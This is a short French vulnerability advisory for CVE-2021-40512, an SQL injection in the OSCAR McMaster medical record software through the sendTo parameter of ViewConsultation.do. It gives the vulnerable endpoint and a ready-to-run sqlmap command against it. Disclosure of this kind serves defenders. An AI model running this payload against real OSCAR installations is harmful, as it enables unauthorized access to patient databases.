
CVE-2021-40512 OSCAR McMaster 19.40~1235 Vulnérabilité d'injection SQL.
Une vulnérabilité d'injection SQL existe dans la version 19.40~1235 d'OSCAR McMaster. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL/MariaDB via le paramètre vulnérable sendTo situé au niveau du point d'accès /oscar/oscarEncounter/ViewConsultation.do.
[Espace réservé pour cve.mitre]
[Espace réservé pour nist]
Page JSP vulnérable :
ViewConsultation.do - paramètre sendTo
Payload vulnérable :
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner
Découvert par Jack McBride, août 2021